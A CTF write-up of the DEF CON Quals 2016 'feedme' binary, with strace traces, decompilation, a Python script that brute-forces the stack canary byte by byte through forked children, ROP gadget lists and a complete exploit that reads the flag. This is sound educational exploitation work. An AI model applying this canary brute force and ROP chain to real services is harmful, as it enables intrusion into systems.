rootfoo.org

Legitbs Defcon Quals 2016 - Feedme

2016-05-25
By meta (of Neg9)

The feedme challenge was a 32-bit Linux pwnable binary that was statically linked, compiled with stack smashing protection (canaries), had a non-executable stack, cloned a lot of child processes and, as always, the server had ALSR enabled. Legitbs always hosts a high quality game, so even though this was one of the challenges from the "baby's first" category, the bar is high enough to keep things interesting.


	$ file feedme
	feedme: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped
	
	$ ctf-payload -a 256 | ./feedme
	FEED ME!
	ATE 41414141414141414141414141414141...
	*** stack smashing detected ***: ./feedme terminated
	Child exit.
	FEED ME!
	ATE 41414141414141414141414141414141...
	*** stack smashing detected ***: ./feedme terminated
	Child exit.
	FEED ME!
	ATE 41414141414141414141414141414141...
	*** stack smashing detected ***: ./feedme terminated
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.

Recon

Using strace we can see that the program clones a lot of child processes. Each child process writes "FEED ME!" to STDOUT, gets user input from STDIN, and then exits. The stack smashing error message lets us know that our input wrote past the buffer boundary and clobbered the stack canary. Another interesting thing to note is that the program is reading 65 characters, which is suspicious because the ordinal value of 'A' is 65 decimal (0x41 hexadecimal). Note that strace is more useful than ltrace here because of the static linking.

	$ ctf-payload -a 2048 | strace -if -e read,write,clone ./feedme 
	strace: [ Process PID=23843 runs in 32 bit mode. ]
	[f7728be9] clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x9e2e8a8) = 23844
	strace: Process 23844 attached
	[pid 23844] [f7728be9] write(1, "FEED ME!", 8) = 8
	[pid 23844] [f7728be9] write(1, "\n", 1FEED ME!) = 1
	[pid 23844] [f7728be9] read(0, "A", 1)  = 1
	[pid 23844] [f7728be9] read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 65) = 65
	[pid 23844] [f7728be9] write(1, "ATE 4141414141414141414141414141"..., 40ATE 41414141414141414141414141414141...) = 40
	*** stack smashing detected ***: ./feedme terminated
	[pid 23844] [f7728be9] --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=23844, si_uid=1000} ---
	[pid 23844] [????????] +++ killed by SIGABRT (core dumped) +++
	[f7728be9] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_DUMPED, si_pid=23844, si_uid=1000, si_status=SIGABRT, si_utime=0, si_stime=0} ---
	[f7728be9] write(1, "Child exit.", 11)  = 11
	[f7728be9] write(1, "\n", 1Child exit.) = 1
	[f7728be9] clone(strace: Process 23846 attached
	child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x9e2e8a8) = 23846
	[pid 23846] [f7728be9] write(1, "FEED ME!", 8) = 8
	[pid 23846] [f7728be9] write(1, "\n", 1) = 1
	FEED ME!
	[pid 23846] [f7728be9] read(0, "A", 1)  = 1
	[pid 23846] [f7728be9] read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 65) = 65
	[pid 23846] [f7728be9] write(1, "ATE 4141414141414141414141414141"..., 40) = 40
	ATE 41414141414141414141414141414141...
	*** stack smashing detected ***: ./feedme terminated
	[pid 23846] [f7728be9] --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=23846, si_uid=1000} ---
	[pid 23846] [????????] +++ killed by SIGABRT (core dumped) +++
	[f7728be9] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_DUMPED, si_pid=23846, si_uid=1000, si_status=SIGABRT, si_utime=0, si_stime=0} ---
	[f7728be9] write(1, "Child exit.", 11)  = 11
	[f7728be9] write(1, "\n", 1Child exit.) = 1
	[f7728be9] clone(strace: Process 23848 attached
	child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x9e2e8a8) = 23848
	[pid 23848] [f7728be9] write(1, "FEED ME!", 8) = 8
	[pid 23848] [f7728be9] write(1, "\n", 1FEED ME!) = 1
	[pid 23848] [f7728be9] read(0, "A", 1)  = 1
	[pid 23848] [f7728be9] read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 65) = 65
	[pid 23848] [f7728be9] write(1, "ATE 4141414141414141414141414141"..., 40ATE 41414141414141414141414141414141...) = 40
	*** stack smashing detected ***: ./feedme terminated

Testing with "BAAA.." instead of "AAAA..." we get the following result which confirms that the first byte of user input determines the number of bytes to read (66 in this case).


	$ ctf-payload "B" -a 256 | strace -if -e read,write,clone ./feedme
	strace: [ Process PID=24729 runs in 32 bit mode. ]
	[f7790be9] clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x9dcd8a8) = 24730
	strace: Process 24730 attached
	[pid 24730] [f7790be9] write(1, "FEED ME!", 8FEED ME!) = 8
	[pid 24730] [f7790be9] write(1, "\n", 1
	) = 1
	[pid 24730] [f7790be9] read(0, "B", 1)  = 1
	[pid 24730] [f7790be9] read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 66) = 66
	[pid 24730] [f7790be9] write(1, "ATE 4141414141414141414141414141"..., 40ATE 41414141414141414141414141414141...
	) = 40
	*** stack smashing detected ***: ./feedme terminated

Opening the program in IDA reveals that there are a lot of functions, but many of these will be subroutines like strlen() or memcpy() from libc. However, without symbols from dynamic linking, we don't know which. So we start by cross-referencing strings to find functions that are interesting.

In the following Hexrays decompilation we can see that v4 is the stack canary and v3 is the user input buffer that overflows the canary. Because the function validates the canary before it returns, the program detects the overflow and exits. You can also see from IDA that the user input buffer (v3) is 0x20 bytes based on the stack offset of v3 from v4 (0x2C-0xC == 0x20).


int sub_8049036()
{
	unsigned __int8 v0; // ST1B_1@1
	int v1; // eax@1
	int result; // eax@1
	char v3; // [sp+1Ch] [bp-2Ch]@1  // <--- user input buffer
	int v4; // [sp+3Ch] [bp-Ch]@1    // <--- stack canary

	v4 = *MK_FP(__GS__, 20);
	sub_804FC60("FEED ME!");
	v0 = sub_8048E42();
	sub_8048E7E(&v3, v0);
	v1 = sub_8048F6E(&v3, v0, 16);
	sub_804F700("ATE %s\n", v1);
	result = v0;
	if ( *MK_FP(__GS__, 20) != v4 )   // <--- validate stack canary before return
		sub_806F5B0();
	return result;
}

Forking Stack Canaries

In oder to gain control of EIP, we must overwrite the stack canary with the correct value. The stack canary value is initialized when the program starts every time a new connection is established. However, because the children that handle user input are cloned, they all use the same canary value as the parent process. We verify that 33 (0x21) bytes is exactly enough to overwrite the first byte of the stack canary and notice the really nice information disclosure message - the program prints "YUM" unless we overflow the stack canary. Note that ord(" ") == 32 and ord("!") == 33.

	$ ctf-payload " " -a32 | ./feedme | head
	FEED ME!
	ATE 41414141414141414141414141414141...
	YUM, got 32 bytes!
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!

	$ ctf-payload "!" -a33 | ./feedme | head
	FEED ME!
	*** ATE 41414141414141414141414141414141...
	Child exit.
	FEED ME!
	Child exit.
	FEED ME!
	Child exit.

The canary is a 32-bit integer, so in theory there are 2**32 == 256**4 == 4294967296 possibilities if we try to brute force it outright; but what if we only overwrite one byte of the canary? The feedme program will not print "YUM" if we overflow the first byte of the canary (with the wrong value), but if we guess that byte correctly, it will let us know. Thanks canary! Hence, we can brute force the first byte of the canary until it successfully validates (256 possibilities). Once we have the first byte of the canary, we can extend the payload and then brute force the second byte, and then the third, and fourth. Brute force the canary byte-wise would only require 256*4 == 1024 requests at most, but since we only need to iterate until we find the correct value for a byte, on average it will be less than 1024. We see from IDA (or dynamic analysis) that the main loop has 799 iterations, so this is within the realm of possibilities.

The following python script brute forces the correct stack canary:


s = Sock('localhost', 9000, timeout=1)
s.read()
canary = ""
s.socket.settimeout(.15)

# brute force the stack canary
for i in range(4):
	for x in range(0,256):
		payload = 'A'*0x20 + canary + chr(x) 
		print "Canary: " + (canary + chr(x)).encode('hex')
		s.write(chr(len(payload)) + payload)
		msg = s.read()
		if "YUM" in msg:
			canary += chr(x)
			break

We run the program on localhost with socat and strace in order to verify the brute is successful. If so, our payload will overwrite EIP exit with a segmentation fault. This is really satisfying to watch because it looks like hacking from the movies. :)

	$ python exploit .py
	...
	Canary: 0000
	Canary: 0001
	Canary: 0002
	Canary: 0003
	Canary: 0004
	Canary: 0005
	Canary: 0006
	Canary: 000600
	...
	Canary: 00631c
	Canary: 00631c00
	Canary: 00631c01
	...

Meanwhile, in the other terminal, we see the SIGSEGV and note that EIP is overwritten with 0x43434343!

	$ socat tcp4-l:9000,reuseaddr,fork exec:"strace -if ./feedme"
	...
	[pid 29168] [f7735be9] write(1, "FEED ME!", 8) = 8
	[pid 29168] [f7735be9] write(1, "\n", 1) = 1
	[pid 29168] [f7735be9] read(0, "$", 1)  = 1
	[pid 29168] [f7735be9] read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 36) = 36
	[pid 29168] [f7735be9] write(1, "ATE 4141414141414141414141414141"..., 40) = 40
	[pid 29168] [f7735be9] write(1, "YUM, got 36 bytes!\n", 19) = 19
	[pid 29168] [f7735be9] exit_group(0)    = ?
	[pid 29168] [????????] +++ exited with 0 +++
	[f7735be9] <... waitpid resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0) = 29168
	[f7735be9] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=29168, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
	[f7735be9] write(1, "Child exit.", 11)  = 11
	[f7735be9] write(1, "\n", 1)            = 1
	[f7735be9] clone(strace: Process 29169 attached
	child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x90918a8) = 29169
	[pid 28150] [f7735be9] waitpid(29169,  
	[pid 29169] [f7735be9] write(1, "FEED ME!", 8) = 8
	[pid 29169] [f7735be9] write(1, "\n", 1) = 1
	[pid 29169] [f7735be9] read(0, "4", 1)  = 1
	[pid 29169] [f7735be9] read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 52) = 52
	[pid 29169] [f7735be9] write(1, "ATE 4141414141414141414141414141"..., 40) = 40
	[pid 29169] [43434343] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x43434343} ---
	[pid 29169] [????????] +++ killed by SIGSEGV (core dumped) +++

Finding ROP gadgets and PoC exploit

Cool, we can successfully brute force the stack canary and control EIP! ASLR is enabled on the server and NX is enabled so we certainly aren't going to jump to shellcode on the stack. The binary is statically linked so we can't leak the address of functions in the GOT/PLT in order to calculate the runtime address of system(). However, the upside of static linking is that the binary should contain sufficiently many ROP gadgets, including a syscall gadget. We get a list of available gadgets from ROPGadget and make note of those that seem most useful.

	$ ROPgadget --binary feedme
	0x080bb496 : pop eax ; ret
	0x080481c9 : pop ebx ; ret
	0x0806f34a : pop edx ; ret
	0x0806f371 : pop ecx ; pop ebx ; ret
	0x080da193 : jmp esp
	0x0804b634 : xchg eax, esp ; ret
	0x080ad71c : xchg eax, edx ; ret
	0x0809a7ed : mov dword ptr [edx], eax ; ret
	0x0806fa20 : int 0x80; ret

	$ ROPgadget --binary feedme --string "Success"
	0x080d844c : "Success"

A typical ROP exploit for a 32-bit Linux binary would setup the stack with the parameters to a function call, such as system(), but that assumes we know (or can leak) the address of system(). Instead we will pop each parameter into a register and make a syscall directly using an "int 0x80; ret" gadget. This is the same technique required to exploit 64-bit systems where the parameters to function calls are always passed via registers instead of on the stack. First we build a small ROP chain, as a proof of concept, that prints a string to make sure everything works locally and against the server. To execute a Linux system call, put the system call number in EAX and the parameters in EBX, ECX, and EDX respectively. I found the address of the string "Success" and use the write system call (0x4) to write the 0x7 byte long string to STDOUT (0x1). You build the payload such that EIP is overwritten with the first gadget (pop eax in this case).

  	write_success_payload = prefix + pack(
		0x080bb496, # pop eax
		0x4,        # eax = write syscall
		0x0806f371, # pop ecx ; pop ebx ; ret
		0x080d844c, # ecx = address of "Success"
		0x1,        # ebx = stdout
		0x0806f34a, # pop edx ; ret
		0x7,        # edx = num of bytes to write
	 	0x0806fa20  # int 0x80; ret
		)

Chaining ROP gadgets to read the flag

Once I verified that the server indeed replies with the message "Success" we know we are in business. We build the final exploit by chaining a series of ROP gadgets to open the file "/home/feedme/flag", read the contents to a writeable section in memory, and then write the resulting string to STDOUT. I made the assumption that the program was running from the current directory so we use the relative path to "flag" and I also verified that the location in memory is initialized with null bytes, so the string is conveniently 4 bytes long and null terminated for free. The pseudo code for the ROP chains:

	mov 0x080ea060, "flag"
	open("flag", 0, 0)
	read(2, 0x080ea060, 0x100)
	write(1, 0x080ea060, 0x100). 

Here is the final exploit. Note that this script (and several of the above commands) use the libctf python library and tools that I've developed for CTF. The pack function below takes mixed data types, packs integers appropriately, and then concatenates and return the resulting string. This is very convenient for writing ROP exploits and makes them very readable. The ctf-payload command is a command line wrapper around these packing functions and has builtin cyclic pattern generation.


#!/usr/bin/python
from libctf import *

if __name__=='__main__':
	host,port = "feedme_47aa9b0d8ad186754acd4bece3d6a177.quals.shallweplayaga.me",4092
	#host,port = "localhost",9000
	s = Sock(host, port, timeout=1)
	
	s.verbose = False
	print s.read()
	canary = ""
	s.socket.settimeout(.15)

	# brute force the stack canary
	for i in range(4):
		for x in range(0,256):
			payload = 'A'*0x20 + canary + chr(x) 
			print "Canary: " + (canary + chr(x)).encode('hex')
			s.write(chr(len(payload)) + payload)
			msg = s.read()
			print msg
			if "YUM" in msg:
				canary += chr(x)
				print "#"*10 + repr(canary) + "#"*10
				break
			

	prefix = payload + "B"*12  
	#payload = prefix + "C"*4  # eip = CCCCCC

	"""
	# useful gadgets and addresses
	0x080bb496 : pop eax ; ret
	0x080481c9 : pop ebx ; ret
	0x0806f34a : pop edx ; ret
	0x0806f371 : pop ecx ; pop ebx ; ret
	0x080da193 : jmp esp
	0x0804b634 : xchg eax, esp ; ret
	0x080ad71c : xchg eax, edx ; ret
	0x0806fa20 : int 0x80; ret
	0x080d844c : "Success"
	0x080ea060 : writable address in .data
	"""
	write_success_payload = prefix + pack(
		# write(ebx, ecx, edx)
		# write(1, 0x80d844c, 7)
		0x080bb496, # pop eax
		0x4,        # eax = write syscall
		0x0806f371, # pop ecx ; pop ebx ; ret
		0x080d844c, # ecx = address of "Success"
		0x1,        # ebx = stdout
		0x0806f34a, # pop edx ; ret
		0x7,        # edx = num of bytes to write
	 	0x0806fa20  # int 0x80; ret
		)

	send_flag_payload = prefix + pack(
		# move string "flag" into memory
		0x0806f34a, # pop edx ; ret
		0x080ea060, # writable memory address in .data
		0x080bb496, # pop eax ; ret
		'flag',     # "flag" string; conveniently 4 bytes
		0x0809a7ed, # mov dword ptr [edx], eax ; ret

		# open(path, flags, mode)
		0x080bb496, # pop eax
		0x5,        # open syscall
		0x0806f371, # pop ecx ; pop ebx ; ret
		0x0,	    # flags bitmask set to O_RDONLY
		0x080ea060, # address of "flag"
		0x0806f34a, # pop edx ; ret
		0x0,        # mode bitmask ignored
		0x0806fa20, # int 0x80; ret

		# read(fd, buf, count)
		0x080bb496, # pop eax
		0x3,        # read syscall
		0x0806f371, # pop ecx ; pop ebx ; ret
		0x080ea060, # writeable memory address in .data
		0x2,	    # file descriptor
		0x0806f34a, # pop edx ; ret
		0x100,      # count bytes to read
		0x0806fa20, # int 0x80; ret

		# write(fd, buf, count)
		0x080bb496, # pop eax
		0x4,        # write syscall
		0x0806f371, # pop ecx ; pop ebx ; ret
		0x080ea060, # source memory address
		0x1,	    # stdout
		0x0806f34a, # pop edx ; ret
		0x100,      # count bytes to write
		0x0806fa20, # int 0x80; ret
	)

	payload = send_flag_payload
	s.write(chr(len(payload)) + payload)
	print s.read()
	#s.interact()	

Pwnage

	$ python exploit.py
	...
	Canary: 00b91bae
	Canary: 00b91baf
	Canary: 00b91bb0
	Canary: 00b91bb1
	FEED ME!
	ATE 41414141414141414141414141414141...
	YUM, got 36 bytes!
	Child exit.

	The flag is: It's too bad! we c0uldn't??! d0 the R0P CHAIN BLIND TOO